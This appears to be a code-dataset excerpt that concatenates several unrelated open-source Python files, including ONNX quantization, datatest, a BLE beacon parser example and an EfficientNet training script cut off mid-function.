max_stars_repo_path
stringlengths 4
245
| max_stars_repo_name
stringlengths 7
115
| max_stars_count
int64 101
368k
| id
stringlengths 2
8
| content
stringlengths 6
1.03M
|
---|---|---|---|---|
pycell/prologue/native/set_.py | andybalaam/cell | 118 | 15568 | <reponame>andybalaam/cell<filename>pycell/prologue/native/set_.py
def _do_set(env, name, value):
if env.contains(name):
env.set(name, value)
elif env.parent is not None:
_do_set(env.parent, name, value)
else:
raise Exception(
"Attempted to set name '%s' but it does not exist." %
name
)
def set_(env, symbol_name, value):
if symbol_name[0] != "string":
raise Exception(
"set() takes a string as its first argument, but was: %s" %
str(symbol_name)
)
_do_set(env, symbol_name[1], value)
return value
|
onnxruntime/python/tools/quantization/operators/qdq_base_operator.py | mszhanyi/onnxruntime | 669 | 15589 | <gh_stars>100-1000
import itertools
from ..quant_utils import QuantizedValue, QuantizedValueType, attribute_to_kwarg, quantize_nparray
from .base_operator import QuantOperatorBase
class QDQOperatorBase:
def __init__(self, onnx_quantizer, onnx_node):
self.quantizer = onnx_quantizer
self.node = onnx_node
self.disable_qdq_for_node_output = (
True if onnx_node.op_type in onnx_quantizer.op_types_to_exclude_output_quantization else False
)
def quantize(self):
node = self.node
if self.disable_qdq_for_node_output:
tensors_to_quantize = node.input
else:
tensors_to_quantize = itertools.chain(node.input, node.output)
for tensor_name in tensors_to_quantize:
self.quantizer.quantize_tensor(tensor_name)
|
tests/integration/testdata/buildcmd/PyLayerMake/layer.py | renanmontebelo/aws-sam-cli | 2,959 | 15615 | import numpy
def layer_method():
return {"pi": "{0:.2f}".format(numpy.pi)}
|
test/test_i18n.py | timgates42/uliweb | 202 | 15636 | <gh_stars>100-1000
from uliweb.i18n import ugettext_lazy as _
def test_1():
"""
>>> x = _('Hello')
>>> print repr(x)
ugettext_lazy('Hello')
"""
def test_1():
"""
>>> x = _('Hello {0}')
>>> print x.format('name')
Hello name
""" |
f5/bigip/tm/vcmp/test/unit/test_virtual_disk.py | nghia-tran/f5-common-python | 272 | 15646 | <reponame>nghia-tran/f5-common-python
# Copyright 2017 F5 Networks Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import mock
import pytest
from f5.bigip.tm.vcmp.virtual_disk import Virtual_Disk
from f5.sdk_exception import UnsupportedMethod
@pytest.fixture
def FakeResource():
mo = mock.MagicMock()
return Virtual_Disk(mo)
def test_create(FakeResource):
with pytest.raises(UnsupportedMethod) as ex:
FakeResource.create()
assert "does not support the create method" in str(ex.value)
def test_update(FakeResource):
with pytest.raises(UnsupportedMethod) as ex:
FakeResource.update()
assert "does not support the update method" in str(ex.value)
def test_modify(FakeResource):
with pytest.raises(UnsupportedMethod) as ex:
FakeResource.modify()
assert "does not support the modify method" in str(ex.value)
|
datatest/main.py | ajhynes7/datatest | 277 | 15657 | """Datatest main program"""
import sys as _sys
from unittest import TestProgram as _TestProgram
from unittest import defaultTestLoader as _defaultTestLoader
try:
from unittest.signals import installHandler
except ImportError:
installHandler = None
from datatest import DataTestRunner
__unittest = True
__datatest = True
class DataTestProgram(_TestProgram):
def __init__(self, module='__main__', defaultTest=None, argv=None,
testRunner=DataTestRunner, testLoader=_defaultTestLoader,
exit=True, verbosity=1, failfast=None, catchbreak=None,
buffer=None, ignore=False):
self.ignore = ignore
_TestProgram.__init__(self,
module=module,
defaultTest=defaultTest,
argv=argv,
testRunner=testRunner,
testLoader=testLoader,
exit=exit,
verbosity=verbosity,
failfast=failfast,
catchbreak=catchbreak,
buffer=buffer)
def runTests(self):
try:
if self.catchbreak and installHandler:
installHandler()
except AttributeError:
pass # does not have catchbreak attribute
if self.testRunner is None:
self.testRunner = DataTestRunner
if isinstance(self.testRunner, type):
try:
kwds = ['verbosity', 'failfast', 'buffer', 'warnings', 'ignore']
kwds = [attr for attr in kwds if hasattr(self, attr)]
kwds = dict((attr, getattr(self, attr)) for attr in kwds)
testRunner = self.testRunner(**kwds)
except TypeError:
if 'warnings' in kwds:
del kwds['warnings']
testRunner = self.testRunner(**kwds)
else:
# assumed to be a TestRunner instance
testRunner = self.testRunner
self.result = testRunner.run(self.test)
if self.exit:
_sys.exit(not self.result.wasSuccessful())
if _sys.version_info[:2] == (3, 1): # Patch methods for Python 3.1.
def __init__(self, module='__main__', defaultTest=None, argv=None,
testRunner=DataTestRunner, testLoader=_defaultTestLoader,
exit=True, ignore=False):
self.ignore = ignore
_TestProgram.__init__(self,
module=module,
defaultTest=defaultTest,
argv=argv,
testRunner=testRunner,
testLoader=testLoader,
exit=exit)
DataTestProgram.__init__ = __init__
elif _sys.version_info[:2] == (2, 6): # Patch runTests() for Python 2.6.
def __init__(self, module='__main__', defaultTest=None, argv=None,
testRunner=DataTestRunner, testLoader=_defaultTestLoader,
exit=True, ignore=False):
self.exit = exit # <- 2.6 does not handle exit argument.
self.ignore = ignore
_TestProgram.__init__(self,
module=module,
defaultTest=defaultTest,
argv=argv,
testRunner=testRunner,
testLoader=testLoader)
DataTestProgram.__init__ = __init__
main = DataTestProgram
|
observations/r/chest_sizes.py | hajime9652/observations | 199 | 15666 | <reponame>hajime9652/observations
# -*- coding: utf-8 -*-
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import csv
import numpy as np
import os
import sys
from observations.util import maybe_download_and_extract
def chest_sizes(path):
"""Chest measurements of 5738 Scottish Militiamen
Quetelet's data on chest measurements of 5738 Scottish Militiamen.
Quetelet (1846) used this data as a demonstration of the normal
distribution of physical characteristics.
A data frame with 16 observations on the following 2 variables.
`chest`
Chest size (in inches)
`count`
Number of soldiers with this chest size
<NAME>. and <NAME>. (1981). *Applications, Basics, and
Computing of Exploratory Data Analysis*. Belmont. CA: Wadsworth.
Retrieved from Statlib:
`https://www.stat.cmu.edu/StatDat/Datafiles/MilitiamenChests.html`
Args:
path: str.
Path to directory which either stores file or otherwise file will
be downloaded and extracted there.
Filename is `chest_sizes.csv`.
Returns:
Tuple of np.ndarray `x_train` with 16 rows and 2 columns and
dictionary `metadata` of column headers (feature names).
"""
import pandas as pd
path = os.path.expanduser(path)
filename = 'chest_sizes.csv'
if not os.path.exists(os.path.join(path, filename)):
url = 'http://dustintran.com/data/r/HistData/ChestSizes.csv'
maybe_download_and_extract(path, url,
save_file_name='chest_sizes.csv',
resume=False)
data = pd.read_csv(os.path.join(path, filename), index_col=0,
parse_dates=True)
x_train = data.values
metadata = {'columns': data.columns}
return x_train, metadata
|
examples/parser_example.py | pibico/beacontools | 139 | 15676 | <gh_stars>100-1000
# -*- coding: utf-8 -*-
from beacontools import parse_packet
# Eddystone UID packet
uid_packet = b"\x02\x01\x06\x03\x03\xaa\xfe\x17\x16\xaa\xfe\x00\xe3\x12\x34\x56\x78\x90\x12" \
b"\x34\x67\x89\x01\x00\x00\x00\x00\x00\x01\x00\x00"
uid_frame = parse_packet(uid_packet)
print("Namespace: %s" % uid_frame.namespace)
print("Instance: %s" % uid_frame.instance)
print("TX Power: %s" % uid_frame.tx_power)
print("-----")
# Eddystone URL packet
url_packet = b"\x03\x03\xAA\xFE\x13\x16\xAA\xFE\x10\xF8\x03github\x00citruz"
url_frame = parse_packet(url_packet)
print("TX Power: %d" % url_frame.tx_power)
print("URL: %s" % url_frame.url)
print("-----")
# Eddystone TLM packet (unencrypted)
tlm_packet = b"\x02\x01\x06\x03\x03\xaa\xfe\x11\x16\xaa\xfe\x20\x00\x0b\x18\x13\x00\x00\x00" \
b"\x14\x67\x00\x00\x2a\xc4\xe4"
tlm_frame = parse_packet(tlm_packet)
print("Voltage: %d mV" % tlm_frame.voltage)
print("Temperature: %f °C" % tlm_frame.temperature)
print("Advertising count: %d" % tlm_frame.advertising_count)
print("Seconds since boot: %d" % tlm_frame.seconds_since_boot)
print("-----")
# Eddystone TLM packet (encrypted)
enc_tlm_packet = b"\x02\x01\x06\x03\x03\xaa\xfe\x11\x16\xaa\xfe\x20\x01\x41\x41\x41\x41\x41" \
b"\x41\x41\x41\x41\x41\x41\x41\xDE\xAD\xBE\xFF"
enc_tlm_frame = parse_packet(enc_tlm_packet)
print("Data: %s" % enc_tlm_frame.encrypted_data)
print("Salt: %d" % enc_tlm_frame.salt)
print("Mic: %d" % enc_tlm_frame.mic)
print("-----")
# iBeacon Advertisement
ibeacon_packet = b"\x02\x01\x06\x1a\xff\x4c\x00\x02\x15\x41\x41\x41\x41\x41\x41\x41\x41\x41" \
b"\x41\x41\x41\x41\x41\x41\x41\x00\x01\x00\x01\xf8"
adv = parse_packet(ibeacon_packet)
print("UUID: %s" % adv.uuid)
print("Major: %d" % adv.major)
print("Minor: %d" % adv.minor)
print("TX Power: %d" % adv.tx_power)
print("-----")
# Cypress iBeacon Sensor
cypress_packet = b"\x02\x01\x04\x1a\xff\x4c\x00\x02\x15\x00\x05\x00\x01\x00\x00\x10\x00\x80" \
b"\x00\x00\x80\x5f\x9b\x01\x31\x00\x02\x6c\x66\xc3"
sensor = parse_packet(cypress_packet)
print("UUID: %s" % sensor.uuid)
print("Major: %d" % sensor.major)
print("Temperature: %d °C" % sensor.cypress_temperature)
print("Humidity: %d %%" % sensor.cypress_humidity)
print("TX Power: %d" % sensor.tx_power)
print("-----")
# Estimote Telemetry Packet (Subframe A)
telemetry_a_packet = b"\x02\x01\x04\x03\x03\x9a\xfe\x17\x16\x9a\xfe\x22\x47\xa0\x38\xd5"\
b"\xeb\x03\x26\x40\x00\x00\x01\x41\x44\x47\xfa\xff\xff\xff\xff"
telemetry = parse_packet(telemetry_a_packet)
print("Identifier: %s" % telemetry.identifier)
print("Protocol Version: %d" % telemetry.protocol_version)
print("Acceleration (g): (%f, %f, %f)" % telemetry.acceleration)
print("Is moving: %s" % telemetry.is_moving)
# ... see packet_types/estimote.py for all available attributes and units
print("-----")
# Estimote Telemetry Packet (Subframe B)
telemetry_b_packet = b"\x02\x01\x04\x03\x03\x9a\xfe\x17\x16\x9a\xfe\x22\x47\xa0\x38\xd5"\
b"\xeb\x03\x26\x40\x01\xd8\x42\xed\x73\x49\x25\x66\xbc\x2e\x50"
telemetry_b = parse_packet(telemetry_b_packet)
print("Identifier: %s" % telemetry_b.identifier)
print("Protocol Version: %d" % telemetry_b.protocol_version)
print("Magnetic field: (%f, %f, %f)" % telemetry_b.magnetic_field)
print("Temperature: %f °C" % telemetry_b.temperature)
# ... see packet_types/estimote.py for all available attributes and units
# Estimote Nearable Advertisement
nearable_packet = b"\x02\x01\x04\x03\x03\x0f\x18\x17\xff\x5d" \
b"\x01\x01\x1e\xfe\x42\x7e\xb6\xf4\xbc\x2f" \
b"\x04\x01\x68\xa1\xaa\xfe\x05\xc1\x45\x25" \
b"\x53\xb5"
nearable_adv = parse_packet(nearable_packet)
print("Identifier: %s" % nearable_adv.identifier)
print("Hardware_version: %d" % nearable_adv.hardware_version)
print("Firmware_version: %d" % nearable_adv.firmware_version)
print("Temperature: %d" % nearable_adv.temperature)
print("Is moving: %i" % nearable_adv.is_moving)
print("-----")
# CJ Monitor packet
cj_monitor_packet = b"\x02\x01\x06\x05\x02\x1A\x18\x00\x18" \
b"\x09\xFF\x72\x04\xFE\x10\xD1\x0C\x33\x61" \
b"\x09\x09\x4D\x6F\x6E\x20\x35\x36\x34\x33"
cj_monitor = parse_packet(cj_monitor_packet)
print("Name: %s" % cj_monitor.name)
print("Temperature: %f °C" % cj_monitor.temperature)
print("Humidity: %d %%" % cj_monitor.humidity)
print("Light: %f" % cj_monitor.light)
|
classification/train_classifier_tf.py | dnarqq/WildHack | 402 | 15715 | r"""Train an EfficientNet classifier.
Currently implementation of multi-label multi-class classification is
non-functional.
During training, start tensorboard from within the classification/ directory:
tensorboard --logdir run --bind_all --samples_per_plugin scalars=0,images=0
Example usage:
python train_classifier_tf.py run_idfg /ssd/crops_sq \
-m "efficientnet-b0" --pretrained --finetune --label-weighted \
--epochs 50 --batch-size 512 --lr 1e-4 \
--seed 123 \
--logdir run_idfg
"""
from __future__ import annotations
import argparse
from collections import defaultdict
from collections.abc import Callable, Mapping, MutableMapping, Sequence
from datetime import datetime
import json
import os
from typing import Any, Optional
import uuid
import numpy as np
import sklearn.metrics
import tensorflow as tf
from tensorboard.plugins.hparams import api as hp
import tqdm
from classification.train_utils import (
HeapItem, recall_from_confusion_matrix, add_to_heap, fig_to_img,
imgs_with_confidences, load_dataset_csv, prefix_all_keys)
from visualization import plot_utils
AUTOTUNE = tf.data.experimental.AUTOTUNE
# match pytorch EfficientNet model names
EFFICIENTNET_MODELS: Mapping[str, Mapping[str, Any]] = {
'efficientnet-b0': dict(cls='EfficientNetB0', img_size=224, dropout=0.2),
'efficientnet-b1': dict(cls='EfficientNetB1', img_size=240, dropout=0.2),
'efficientnet-b2': dict(cls='EfficientNetB2', img_size=260, dropout=0.3),
'efficientnet-b3': dict(cls='EfficientNetB3', img_size=300, dropout=0.3),
'efficientnet-b4': dict(cls='EfficientNetB4', img_size=380, dropout=0.4),
'efficientnet-b5': dict(cls='EfficientNetB5', img_size=456, dropout=0.4),
'efficientnet-b6': dict(cls='EfficientNetB6', img_size=528, dropout=0.5),
'efficientnet-b7': dict(cls='EfficientNetB7', img_size=600, dropout=0.5)
}
def create_dataset(
img_files: Sequence[str],
labels: Sequence[Any],
sample_weights: Optional[Sequence[float]] = None,
img_base_dir: str = '',
transform: Optional[Callable[[tf.Tensor], Any]] = None,
target_transform: Optional[Callable[[Any], Any]] = None,
cache: bool | str = False
) -> tf.data.Dataset:
"""Create a tf.data.Dataset.
The dataset returns elements (img, label, img_file, sample_weight) if
sample_weights is not None, or (img, label, img_file) if
sample_weights=None.
img: tf.Tensor, shape [H, W, 3], type uint8
label: tf.Tensor
img_file: tf.Tensor, scalar, type str
sample_weight: tf.Tensor, scalar, type float32
Possible TODO: oversample the imbalanced classes
see tf.data.experimental.sample_from_datasets
Args:
img_files: list of str, relative paths from img_base_dir
labels: list of int if multilabel=False
sample_weights: optional list of float
img_base_dir: str, base directory for images
transform: optional transform to apply to a single uint8 JPEG image
target_transform: optional transform to apply to a single label
cache: bool or str, cache images in memory if True, cache images to
a file on disk if a str
Returns: tf.data.Dataset
"""
# images dataset
img_ds = tf.data.Dataset.from_tensor_slices(img_files)
img_ds = img_ds.map(lambda p: tf.io.read_file(img_base_dir + os.sep + p),
num_parallel_calls=AUTOTUNE)
# for smaller disk / memory usage, we cache the raw JPEG bytes instead
# of the decoded Tensor
if isinstance(cache, str):
img_ds = img_ds.cache(cache)
elif cache:
img_ds = img_ds.cache()
# convert JPEG bytes to a 3D uint8 Tensor
# keras EfficientNet already includes normalization from [0, 255] to [0, 1],
# so we don't need to do that here
img_ds = img_ds.map(lambda img: tf.io.decode_jpeg(img, channels=3))
if transform:
img_ds = img_ds.map(transform, num_parallel_calls=AUTOTUNE)
# labels dataset
labels_ds = tf.data.Dataset.from_tensor_slices(labels)
if target_transform:
labels_ds = labels_ds.map(target_transform, num_parallel_calls=AUTOTUNE)
# img_files dataset
img_files_ds = tf.data.Dataset.from_tensor_slices(img_files)
if sample_weights is None:
return tf.data.Dataset.zip((img_ds, labels_ds, img_files_ds))
# weights dataset
weights_ds = tf.data.Dataset.from_tensor_slices(sample_weights)
return tf.data.Dataset.zip((img_ds, labels_ds, img_files_ds, weights_ds))
def create_dataloaders(
dataset_csv_path: str,
label_index_json_path: str,
splits_json_path: str,
cropped_images_dir: str,
img_size: int,
multilabel: bool,
label_weighted: bool,
weight_by_detection_conf: bool | str,
batch_size: int,
augment_train: bool,
cache_splits: Sequence[str]
) -> tuple[dict[str, tf.data.Dataset], list[str]]:
"""
Args:
dataset_csv_path: str, path to CSV file with columns
['dataset', 'location', 'label'], where label is a comma-delimited
list of labels
splits_json_path: str, path to JSON file
augment_train: bool, whether to shuffle/augment the training set
cache_splits: list of str, splits to cache
training set is cached at /mnt/tempds/random_file_name
validation and test sets are cached in memory
Returns:
datasets: dict, maps split to DataLoader
label_names: list of str, label names in order of label id
"""
df, label_names, split_to_locs = load_dataset_csv(
dataset_csv_path, label_index_json_path, splits_json_path,
multilabel=multilabel, label_weighted=label_weighted,
weight_by_detection_conf=weight_by_detection_conf)
# define the transforms
# efficientnet data preprocessing:
# - train:
# 1) random crop: aspect_ratio_range=(0.75, 1.33), area_range=(0.08, 1.0)
# 2) bicubic resize to img_size
# 3) random horizontal flip
# - test:
# 1) center crop
# 2) bicubic resize to img_size
@tf.function
def train_transform(img: tf.Tensor) -> tf.Tensor:
"""Returns: tf.Tensor, shape [img_size, img_size, C], type float32"""
img = tf.image.resize_with_pad(img, img_size, img_size,
method=tf.image.ResizeMethod.BICUBIC)
img = tf.image.random_flip_left_right(img)
img = tf.image.random_brightness(img, max_delta=0.25)
img = tf.image.random_contrast(img, lower=0.75, upper=1.25)
img = tf.image.random_saturation(img, lower=0.75, upper=1.25)
return img
@tf.function
def test_transform(img: tf.Tensor) -> tf.Tensor:
"""Returns: tf.Tensor, shape [img_size, img_size, C], type float32"""
img = tf.image.resize_with_pad(img, img_size, img_size,
method=tf.image.ResizeMethod.BICUBIC)
return img
dataloaders = {}
for split, locs in split_to_locs.items():
is_train = (split == 'train') and augment_train
split_df = df[df['dataset_location'].isin(locs)]
weights = None
if label_weighted or weight_by_detection_conf:
# weights sums to:
# - if weight_by_detection_conf: (# images in split - conf delta)
# - otherwise: (# images in split)
weights = split_df['weights'].tolist()
if not weight_by_detection_conf:
assert np.isclose(sum(weights), len(split_df))
cache: bool | str = (split in cache_splits)
if split == 'train' and 'train' in cache_splits:
unique_filename = str(uuid.uuid4())
os.makedirs('/mnt/tempds/', exist_ok=True)
cache = f'/mnt/tempds/{unique_filename}'
ds = create_dataset(
img_files=split_df['path'].tolist(),
labels=split_df['label_index'].tolist(),
sample_weights=weights,
img_base_dir=cropped_images_dir,
transform=train_transform if is_train else test_transform,
target_transform=None,
cache=cache)
if is_train:
ds = ds.shuffle(1000, reshuffle_each_iteration=True)
ds = ds.batch(batch_size).prefetch(buffer_size=AUTOTUNE)
dataloaders[split] = ds
return dataloaders, label_names
def build_model(model_name: str, num_classes: int, img_size: int,
pretrained: bool, finetune: bool) -> tf.keras.Model:
"""Creates a model with an EfficientNet base."""
class_name = EFFICIENTNET_MODELS[model_name]['cls']
dropout = EFFICIENTNET_MODELS[model_name]['dropout']
model_class = tf.keras.applications.__dict__[class_name]
weights = 'imagenet' if pretrained else None
inputs = tf.keras.layers.Input(shape=(img_size, img_size, 3))
base_model = model_class(
input_tensor=inputs, weights=weights, include_top=False, pooling='avg')
if finetune:
# freeze the base model's weights, including BatchNorm statistics
# https://www.tensorflow.org/guide/keras/transfer_learning#fine-tuning
base_model.trainable = False
# rebuild output
x = tf.keras.layers.Dropout(dropout, name='top_dropout')(base_model.output)
outputs = tf.keras.layers.Dense(
num_classes,
kernel_initializer=tf.keras.initializers.VarianceScaling(
scale=1. / 3., mode='fan_out', distribution='uniform'),
name='logits')(x)
model = tf.keras.Model(inputs, outputs, name='complete_model')
model.base_model = base_model # cache this so that we can turn off finetune
return model
def main(dataset_dir: str,
cropped_images_dir: str,
multilabel: bool,
model_name: str,
pretrained: bool,
finetune: int,
label_weighted: bool,
weight_by_detection_conf: bool | str,
epochs: int,
batch_size: int,
lr: float,
weight_decay: float,
seed: Optional[int] = None,
logdir: str = '',
cache_splits: Sequence[str] = ()) -> None:
"""Main function."""
# input validation
assert os.path.exists(dataset_dir)
assert os.path.exists(cropped_images_dir)
if isinstance(weight_by_detection_conf, str):
assert os.path.exists(weight_by_detection_conf)
# set seed
seed = np.random.randint(10_000) if seed is None else seed
np.random.seed(seed)
tf.random.set_seed(seed)
# create logdir and save params
params = dict(locals()) # make a copy
timestamp = datetime.now().strftime('%Y%m%d_%H%M%S') # '20200722_110816'
logdir = os.path.join(logdir, timestamp)
os.makedirs(logdir, exist_ok=True)
print('Created logdir:', logdir)
with open(os.path.join(logdir, 'params.json'), 'w') as f:
json.dump(params, f, indent=1)
gpus = tf.config.experimental.list_physical_devices('GPU')
for gpu in gpus:
tf.config.experimental.set_memory_growth(gpu, True)
img_size = EFFICIENTNET_MODELS[model_name]['img_size']
# create dataloaders and log the index_to_label mapping
loaders, label_names = create_dataloaders(
dataset_csv_path=os.path.join(dataset_dir, 'classification_ds.csv'),
label_index_json_path=os.path.join(dataset_dir, 'label_index.json'),
splits_json_path=os.path.join(dataset_dir, 'splits.json'),
cropped_images_dir=cropped_images_dir,
img_size=img_size,
multilabel=multilabel,
label_weighted=label_weighted,
weight_by_detection_conf=weight_by_detection_conf,
batch_size=batch_size,
augment_train=True,
cache_splits=cache_splits)
writer = tf.summary.create_file_writer(logdir)
writer.set_as_default()
model = build_model(
model_name, num_classes=len(label_names), img_size=img_size,
pretrained=pretrained, finetune=finetune > 0)
# define loss function and optimizer
loss_fn: tf.keras.losses.Loss
if multilabel:
loss_fn = tf.keras.losses.BinaryCrossentropy(
from_logits=True, reduction=tf.keras.losses.Reduction.NONE)
else:
loss_fn = tf.keras.losses.SparseCategoricalCrossentropy(
from_logits=True, reduction=tf.keras.losses.Reduction.NONE)
# using EfficientNet training defaults
# - batch norm momentum: 0.99
# - optimizer: RMSProp, decay 0.9 and momentum 0.9
# - epochs: 350
# - learning rate: 0.256, decays by 0.97 every 2.4 epochs
# - weight decay: 1e-5
lr_schedule = tf.keras.optimizers.schedules.ExponentialDecay(
lr, decay_steps=1, decay_rate=0.97, staircase=True)
optimizer = tf.keras.optimizers.RMSprop(
learning_rate=lr, rho=0.9, momentum=0.9)
best_epoch_metrics: dict[str, float] = {}
for epoch in range(epochs):
print(f'Epoch: {epoch}')
optimizer.learning_rate = lr_schedule(epoch)
tf.summary.scalar('lr', optimizer.learning_rate, epoch)
if epoch > 0 and finetune == epoch:
print('Turning off fine-tune!')
model.base_model.trainable = True
print('- train:')
# TODO: change weighted to False if oversampling minority classes
train_metrics, train_heaps, train_cm = run_epoch(
model, loader=loaders['train'], weighted=label_weighted,
loss_fn=loss_fn, weight_decay=weight_decay, optimizer=optimizer,
finetune=finetune > epoch, return_extreme_images=True)
train_metrics = prefix_all_keys(train_metrics, prefix='train/')
log_run('train', epoch, writer, label_names,
metrics=train_metrics, heaps=train_heaps, cm=train_cm)
print('- val:')
val_metrics, val_heaps, val_cm = run_epoch(
model, loader=loaders['val'], weighted=label_weighted,
loss_fn=loss_fn, return_extreme_images=True)
val_metrics = prefix_all_keys(val_metrics, prefix='val/')
log_run('val', epoch, writer, label_names,
metrics=val_metrics, heaps=val_heaps, cm=val_cm)
if val_metrics['val/acc_top1'] > best_epoch_metrics.get('val/acc_top1', 0): # pylint: disable=line-too-long
filename = os.path.join(logdir, f'ckpt_{epoch}.h5')
print(f'New best model! Saving checkpoint to {filename}')
model.save(filename)
best_epoch_metrics.update(train_metrics)
best_epoch_metrics.update(val_metrics)
best_epoch_metrics['epoch'] = epoch
print('- test:')
test_metrics, test_heaps, test_cm = run_epoch(
model, loader=loaders['test'], weighted=label_weighted,
loss_fn=loss_fn, return_extreme_images=True)
test_metrics = prefix_all_keys(test_metrics, prefix='test/')
log_run('test', epoch, writer, label_names,
metrics=test_metrics, heaps=test_heaps, cm=test_cm)
# stop training after 8 epochs without improvement
if epoch >= best_epoch_metrics['epoch'] + 8:
break
hparams_dict = {
'model_name': model_name,
'multilabel': multilabel,
'finetune': finetune,
'batch_size': batch_size,
'epochs': epochs
}
hp.hparams(hparams_dict)
writer.close()
def log_run(split: str, epoch: int, writer: tf.summary.SummaryWriter,
label_names: Sequence[str], metrics: MutableMapping[str, float],
heaps: Mapping[str, Mapping[int, list[HeapItem]]], cm: np.ndarray
) -> None:
"""Logs the outputs (metrics, confusion matrix, tp/fp/fn images) from a
single epoch run to Tensorboard.
Args:
metrics: dict, keys already prefixed with {split}/
"""
per_class_recall = recall_from_confusion_matrix(cm, label_names)
metrics.update(prefix_all_keys(per_class_recall, f'{split}/label_recall/'))
# log metrics
for metric, value in metrics.items():
tf.summary.scalar(metric, value, epoch)
# log confusion matrix
cm_fig = plot_utils.plot_confusion_matrix(cm, classes=label_names,
normalize=True)
cm_fig_img = tf.convert_to_tensor(fig_to_img(cm_fig)[np.newaxis, ...])
tf.summary.image(f'confusion_matrix/{split}', cm_fig_img, step=epoch)
# log tp/fp/fn images
for heap_type, heap_dict in heaps.items():
log_images_with_confidence(heap_dict, label_names, epoch=epoch,
tag=f'{split}/{heap_type}')
writer.flush()
def log_images_with_confidence(
heap_dict: Mapping[int, list[HeapItem]],
label_names: Sequence[str],
epoch: int,
tag: str) -> None:
"""
Args:
heap_dict: dict, maps label_id to list of HeapItem, where each HeapItem
data is a list [img, target, top3_conf, top3_preds, img_file],
and img is a tf.Tensor of shape [H, W, 3]
label_names: list of str, label names in order of label id
epoch: int
tag: str
"""
for label_id, heap in heap_dict.items():
label_name = label_names[label_id]
sorted_heap = sorted(heap, reverse=True) # sort largest to smallest
imgs_list = [item.data for item in sorted_heap]
fig, img_files = imgs_with_confidences(imgs_list, label_names)
# tf.summary.image requires input of shape [N, H, W, C]
fig_img = tf.convert_to_tensor(fig_to_img(fig)[np.newaxis, ...])
tf.summary.image(f'{label_name}/{tag}', fig_img, step=epoch)
tf.summary.text(f'{label_name}/{tag}_files', '\n\n'.join(img_files),
step=epoch)
def track_extreme_examples(tp_heaps: dict[int, list[HeapItem]],
fp_heaps: dict[int, list[HeapItem]],
fn_heaps: dict[int, list[HeapItem]],
inputs: tf.Tensor,
labels: tf.Tensor,
img_files: tf.Tensor,
logits: tf.Tensor) -> None:
"""Updates the 5 most extreme true-positive (tp), false-positive (fp), and
false-negative (fn) examples with examples from this batch.
Each HeapItem's data attribute is a tuple with:
- img: np.ndarray, shape [H, W, 3], type uint8
- label: int
- top3_conf: list of float
- top3_preds: list of float
- img_file: str
Args:
*_heaps: dict, maps label_id (int) to heap of HeapItems
inputs: tf.Tensor, shape [batch_size, H, W, 3], type float32
labels: tf.Tensor, shape [batch_size]
img_files: tf.Tensor, shape [batch_size], type tf.string
logits: tf.Tensor, shape [batch_size, num_classes]
"""
labels = labels.numpy().tolist()
inputs = inputs.numpy().astype(np.uint8)
img_files = img_files.numpy().astype(str).tolist()
batch_probs = tf.nn.softmax(logits, axis=1)
iterable = zip(labels, inputs, img_files, batch_probs)
for label, img, img_file, confs in iterable:
label_conf = confs[label].numpy().item()
top3_conf, top3_preds = tf.math.top_k(confs, k=3, sorted=True)
top3_conf = top3_conf.numpy().tolist()
top3_preds = top3_preds.numpy().tolist()
data = (img, label, top3_conf, top3_preds, img_file)
if top3_preds[0] == label: # true positive
item = HeapItem(priority=label_conf - top3_conf[1], data=data)
add_to_heap(tp_heaps[label], item, k=5)
else:
# false positive for top3_pred[0]
# false negative for label
item = HeapItem(priority=top3_conf[0] - label_conf, data=data)
add_to_heap(fp_heaps[top3_preds[0]], item, k=5)
add_to_heap(fn_heaps[label], item, k=5)
def run_epoch(model: tf.keras.Model,
loader: tf.data.Dataset,
weighted: bool,
top: Sequence[int] = (1, 3),
loss_fn: Optional[tf.keras.losses.Loss] = None,
weight_decay: float = 0,
finetune: bool = False,
optimizer: Optional[tf.keras.optimizers.Optimizer] = None,
return_extreme_images: bool = False
) -> tuple[
dict[str, float],
dict[str, dict[int, list[HeapItem]]],
np.ndarray
]:
"""Runs for 1 epoch.
Args:
model: tf.keras.Model
loader: tf.data.Dataset
weighted: bool, whether to use sample weights in calculating loss and
accuracy
top: tuple of int, list of values of k for calculating top-K accuracy
loss_fn: optional loss function, calculates the mean loss over a batch
weight_decay: float, L2-regularization constant
finetune: bool, if true sets model's dropout and BN layers to eval mode
optimizer: optional optimizer
Returns:
metrics: dict, metrics from epoch, contains keys:
'loss': float, mean per-example loss over entire epoch,
only included if loss_fn is not None
'acc_top{k}': float, accuracy@k over the entire epoch
heaps: dict, keys are ['tp', 'fp', 'fn'], values are heap_dicts,
each heap_dict maps label_id (int) to a heap of <= 5 HeapItems with
data attribute (img, target, top3_conf, top3_preds, img_file)
- 'tp': priority is the difference between target confidence and
2nd highest confidence
- 'fp': priority is the difference between highest confidence and
target confidence
- 'fn': same as 'fp'
confusion_matrix: np.ndarray, shape [num_classes, num_classes],
C[i, j] = # of samples with true label i, predicted as label j
"""
# if evaluating or finetuning, set dropout & BN layers to eval mode
is_train = False
train_dropout_and_bn = False
if optimizer is not None:
assert loss_fn is not None
is_train = True
if not finetune:
train_dropout_and_bn = True
reg_vars = [
v for v in model.trainable_variables if 'kernel' in v.name]
if loss_fn is not None:
losses = tf.keras.metrics.Mean()
accuracies_topk = {
k: tf.keras.metrics.SparseTopKCategoricalAccuracy(k) for k in top
}
# for each label, track 5 most-confident and least-confident examples
tp_heaps: dict[int, list[HeapItem]] = defaultdict(list)
fp_heaps: dict[int, list[HeapItem]] = defaultdict(list)
fn_heaps: dict[int, list[HeapItem]] = defaultdict(list)
all_labels = []
all_preds = []
tqdm_loader = tqdm.tqdm(loader)
for batch in tqdm_loader:
if weighted:
inputs, labels, img_files, weights = batch
else:
# even if batch contains sample weights, don't use them
inputs, labels, img_files = batch[0:3]
weights = None
all_labels.append(labels.numpy())
desc = []
with tf.GradientTape(watch_accessed_variables=is_train) as tape:
outputs = model(inputs, training=train_dropout_and_bn)
if loss_fn is not None:
loss = loss_fn(labels, outputs)
if weights is not None:
loss *= weights
# we do not track L2-regularization loss in the loss metric
losses.update_state(loss, sample_weight=weights)
desc.append(f'Loss {losses.result().numpy():.4f}')
if optimizer is not None:
loss = tf.math.reduce_mean(loss)
